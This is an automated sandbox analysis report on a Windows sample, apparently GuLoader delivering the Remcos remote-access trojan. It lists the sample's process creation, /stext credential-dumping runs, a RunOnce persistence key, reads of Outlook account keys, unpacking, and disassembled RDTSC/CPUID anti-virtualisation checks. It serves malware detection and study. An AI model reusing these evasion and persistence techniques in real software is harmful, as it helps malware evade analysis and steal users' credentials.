      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004051AB
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004382F3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_00430575
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_0043B671
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_0041F6CD
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004119CF
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_00439B11
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_00438E54
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_00412F67
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_0043CF18
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_1_0045530B
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 004169A7 appears 87 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 0044DB70 appears 41 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 004165FF appears 35 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 00412968 appears 78 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 00421A32 appears 43 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 00416760 appears 69 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 0044407A appears 37 times
      Source: loKmeabs9V.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: loKmeabs9V.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: yourphone.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: yourphone.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: loKmeabs9V.exe, 00000000.00000000.205287548.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exeBinary or memory string: OriginalFilename vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 0000000E.00000003.473704439.000000001E84B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 0000000E.00000000.334706774.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 0000000E.00000002.1292980091.000000001DEA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs loKmeabs9V.exe
      Source: loKmeabs9V.exeBinary or memory string: OriginalFileName vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000016.00000000.466532006.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exeBinary or memory string: OriginalFilename vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000017.00000000.468896528.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000018.00000000.470164942.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exeBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/4@1/3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile created: C:\Users\user\AppData\Roaming\remcosJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile created: C:\Users\user\AppData\Local\Temp\~DF2A65A40B0FC83CF5.TMPJump to behavior
      Source: loKmeabs9V.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\loKmeabs9V.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\loKmeabs9V.exeSystem information queried: HandleInformation
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: loKmeabs9V.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
      Source: loKmeabs9V.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: loKmeabs9V.exe, 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
      Source: loKmeabs9V.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
      Source: loKmeabs9V.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: loKmeabs9V.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: loKmeabs9V.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
      Source: loKmeabs9V.exeVirustotal: Detection: 20%
      Source: loKmeabs9V.exeReversingLabs: Detection: 13%
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile read: C:\Users\user\Desktop\loKmeabs9V.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\loKmeabs9V.exe 'C:\Users\user\Desktop\loKmeabs9V.exe'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe 'C:\Users\user\Desktop\loKmeabs9V.exe'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe 'C:\Users\user\Desktop\loKmeabs9V.exe'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile opened: C:\Users\user\Desktop\loKmeabs9V.cfg
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

      Data Obfuscation:

      barindex
      Detected unpacking (changes PE section rights)Show sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeUnpacked PE file: 22.2.loKmeabs9V.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
      Source: C:\Users\user\Desktop\loKmeabs9V.exeUnpacked PE file: 23.2.loKmeabs9V.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
      Source: C:\Users\user\Desktop\loKmeabs9V.exeUnpacked PE file: 24.2.loKmeabs9V.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_00404DCC push edx; iretd
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_004059BD push F32E5D69h; retf
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044693D push ecx; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044DB70 push eax; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044DB70 push eax; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00451D54 push eax; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00414060 push eax; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00414060 push eax; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00414039 push ecx; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_004164EB push 0000006Ah; retf
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00416553 push 0000006Ah; retf
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00416555 push 0000006Ah; retf
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_00444355 push ecx; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004446D0 push eax; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004446D0 push eax; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_0044AC84 push eax; ret
      Source: initial sampleStatic PE information: section name: .text entropy: 7.07623900315
      Source: initial sampleStatic PE information: section name: .text entropy: 7.07623900315
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile created: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exeJump to dropped file

      Boot Survival:

      barindex
      Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbsJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbsJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B0BC7 TerminateProcess,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B36C3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B8923
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B5DAE
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B87E3 NtWriteVirtualMemory,
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B88DF second address: 00000000022B88F0 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub byte ptr [eax], 00000016h 0x0000000d pushad 0x0000000e lfence 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B62EB second address: 00000000022B62EB instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B73B0 second address: 00000000022B73B0 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B71DE second address: 00000000022B71DE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp bx, dx 0x0000000d jne 00007F72D4EAA1F5h 0x0000000f push dword ptr [esp+04h] 0x00000013 call 00007F72D4EAA40Bh 0x00000018 pushad 0x00000019 nop 0x0000001a nop 0x0000001b mov eax, 00000001h 0x00000020 cpuid 0x00000022 popad 0x00000023 mov ebx, dword ptr [esp+04h] 0x00000027 xor ecx, ecx 0x00000029 add ecx, 02h 0x0000002c cmp word ptr [ebx+ecx], 0000h 0x00000031 jne 00007F72D4EAA218h 0x00000033 add ecx, 02h 0x00000036 cmp word ptr [ebx+ecx], 0000h 0x0000003b jne 00007F72D4EAA218h 0x0000003d add ecx, 02h 0x00000040 cmp word ptr [ebx+ecx], 0000h 0x00000045 jne 00007F72D4EAA218h 0x00000047 add ecx, 02h 0x0000004a cmp word ptr [ebx+ecx], 0000h 0x0000004f jne 00007F72D4EAA218h 0x00000051 add ecx, 02h 0x00000054 cmp word ptr [ebx+ecx], 0000h 0x00000059 jne 00007F72D4EAA218h 0x0000005b add ecx, 02h 0x0000005e cmp word ptr [ebx+ecx], 0000h 0x00000063 jne 00007F72D4EAA218h 0x00000065 add ecx, 02h 0x00000068 cmp word ptr [ebx+ecx], 0000h 0x0000006d jne 00007F72D4EAA218h 0x0000006f retn 0004h 0x00000072 sub ecx, 02h 0x00000075 add eax, 02h 0x00000078 cmp esi, 68CDCEE6h 0x0000007e mov bx, word ptr [eax+ecx] 0x00000082 mov dx, word ptr [esi+ecx] 0x00000086 pushad 0x00000087 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B2448 second address: 00000000022B2448 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000562448 second address: 0000000000562448 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000565FAF second address: 0000000000565FAF instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000569DDA second address: 0000000000569DDA instructions:
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\YOURPHONE.EXE\SUBFOLDER1SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCESTARTUP KEY
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B7F30 second address: 00000000022B7F30 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A494EE6Bh 0x00000007 xor eax, 6C4D1677h 0x0000000c xor eax, 6E4EF001h 0x00000011 xor eax, A697081Ch 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F72D4EAA22Ah 0x0000001e lfence 0x00000021 mov edx, 2EA7C992h 0x00000026 xor edx, 079D8C51h 0x0000002c xor edx, 2142E10Eh 0x00000032 xor edx, 7786A4D9h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp dx, ax 0x00000040 ret 0x00000041 sub edx, esi 0x00000043 ret 0x00000044 cmp cl, dl 0x00000046 add edi, edx 0x00000048 dec dword ptr [ebp+000000F8h] 0x0000004e cmp dword ptr [ebp+000000F8h], 00000000h 0x00000055 jne 00007F72D4EAA208h 0x00000057 test eax, ebx 0x00000059 call 00007F72D4EAA26Fh 0x0000005e call 00007F72D4EAA24Bh 0x00000063 lfence 0x00000066 mov edx, 2EA7C992h 0x0000006b xor edx, 079D8C51h 0x00000071 xor edx, 2142E10Eh 0x00000077 xor edx, 7786A4D9h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 cmp dx, ax 0x00000085 ret 0x00000086 mov esi, edx 0x00000088 pushad 0x00000089 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B7F7B second address: 00000000022B7F7B instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 012985CBh 0x00000013 xor eax, 524C1329h 0x00000018 add eax, C04F8477h 0x0000001d sub eax, 13B51B58h 0x00000022 cpuid 0x00000024 test dx, bx 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F72D4A95E56h 0x00000031 popad 0x00000032 call 00007F72D4A958CFh 0x00000037 lfence 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B88DF second address: 00000000022B88F0 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub byte ptr [eax], 00000016h 0x0000000d pushad 0x0000000e lfence 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B88F0 second address: 00000000022B8A77 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b cmp eax, 6AACECEFh 0x00000010 mov eax, dword ptr [esp+1Ch] 0x00000014 mov byte ptr [eax], 00000006h 0x00000017 xor byte ptr [eax], 00000055h 0x0000001a add byte ptr [eax], 00000051h 0x0000001d sub byte ptr [eax], 0000003Ah 0x00000020 mov byte ptr [eax+01h], FFFFFFD2h 0x00000024 xor byte ptr [eax+01h], 00000000h 0x00000028 cmp ah, dh 0x0000002a xor byte ptr [eax+01h], FFFFFFEEh 0x0000002e jmp 00007F72D4A957D9h 0x00000033 cmp cl, 00000013h 0x00000036 add byte ptr [eax+01h], FFFFFFC4h 0x0000003a mov byte ptr [eax+02h], 0000007Eh 0x0000003e cmp bx, 1188h 0x00000043 xor byte ptr [eax+02h], 00000067h 0x00000047 cmp ax, 000008E1h 0x0000004b cmp ax, cx 0x0000004e xor byte ptr [eax+02h], FFFFFFD8h 0x00000052 pushad 0x00000053 mov al, 9Ah 0x00000055 cmp al, 9Ah 0x00000057 jne 00007F72D4A9693Bh 0x0000005d popad 0x0000005e sub byte ptr [eax+02h], 00000009h 0x00000062 mov edx, dword ptr [ebp+00000138h] 0x00000068 mov dword ptr [eax+03h], edx 0x0000006b pushad 0x0000006c mov eax, 000000EDh 0x00000071 cpuid 0x00000073 popad 0x00000074 mov byte ptr [eax+07h], FFFFFFE2h 0x00000078 xor byte ptr [eax+07h], 00000026h 0x0000007c sub byte ptr [eax+07h], FFFFFF9Fh 0x00000080 xor byte ptr [eax+07h], FFFFFFDAh 0x00000084 test al, al 0x00000086 test dh, ch 0x00000088 mov byte ptr [eax+08h], 0000001Dh 0x0000008c xor byte ptr [eax+08h], FFFFFFACh 0x00000090 add byte ptr [eax+08h], 00000028h 0x00000094 sub byte ptr [eax+08h], 00000009h 0x00000098 cmp dx, B8CFh 0x0000009d pushad 0x0000009e mov edx, 0000005Dh 0x000000a3 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B62EB second address: 00000000022B62EB instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B73B0 second address: 00000000022B73B0 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B71DE second address: 00000000022B71DE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp bx, dx 0x0000000d jne 00007F72D4EAA1F5h 0x0000000f push dword ptr [esp+04h] 0x00000013 call 00007F72D4EAA40Bh 0x00000018 pushad 0x00000019 nop 0x0000001a nop 0x0000001b mov eax, 00000001h 0x00000020 cpuid 0x00000022 popad 0x00000023 mov ebx, dword ptr [esp+04h] 0x00000027 xor ecx, ecx 0x00000029 add ecx, 02h 0x0000002c cmp word ptr [ebx+ecx], 0000h 0x00000031 jne 00007F72D4EAA218h 0x00000033 add ecx, 02h 0x00000036 cmp word ptr [ebx+ecx], 0000h 0x0000003b jne 00007F72D4EAA218h 0x0000003d add ecx, 02h 0x00000040 cmp word ptr [ebx+ecx], 0000h 0x00000045 jne 00007F72D4EAA218h 0x00000047 add ecx, 02h 0x0000004a cmp word ptr [ebx+ecx], 0000h 0x0000004f jne 00007F72D4EAA218h 0x00000051 add ecx, 02h 0x00000054 cmp word ptr [ebx+ecx], 0000h 0x00000059 jne 00007F72D4EAA218h 0x0000005b add ecx, 02h 0x0000005e cmp word ptr [ebx+ecx], 0000h 0x00000063 jne 00007F72D4EAA218h 0x00000065 add ecx, 02h 0x00000068 cmp word ptr [ebx+ecx], 0000h 0x0000006d jne 00007F72D4EAA218h 0x0000006f retn 0004h 0x00000072 sub ecx, 02h 0x00000075 add eax, 02h 0x00000078 cmp esi, 68CDCEE6h 0x0000007e mov bx, word ptr [eax+ecx] 0x00000082 mov dx, word ptr [esi+ecx] 0x00000086 pushad 0x00000087 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B2448 second address: 00000000022B2448 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000567F30 second address: 0000000000567F30 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A494EE6Bh 0x00000007 xor eax, 6C4D1677h 0x0000000c xor eax, 6E4EF001h 0x00000011 xor eax, A697081Ch 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F72D4EAA22Ah 0x0000001e lfence 0x00000021 mov edx, 2EA7C992h 0x00000026 xor edx, 079D8C51h 0x0000002c xor edx, 2142E10Eh 0x00000032 xor edx, 7786A4D9h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp dx, ax 0x00000040 ret 0x00000041 sub edx, esi 0x00000043 ret 0x00000044 cmp cl, dl 0x00000046 add edi, edx 0x00000048 dec dword ptr [ebp+000000F8h] 0x0000004e cmp dword ptr [ebp+000000F8h], 00000000h 0x00000055 jne 00007F72D4EAA208h 0x00000057 test eax, ebx 0x00000059 call 00007F72D4EAA26Fh 0x0000005e call 00007F72D4EAA24Bh 0x00000063 lfence 0x00000066 mov edx, 2EA7C992h 0x0000006b xor edx, 079D8C51h 0x00000071 xor edx, 2142E10Eh 0x00000077 xor edx, 7786A4D9h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 cmp dx, ax 0x00000085 ret 0x00000086 mov esi, edx 0x00000088 pushad 0x00000089 rdtsc
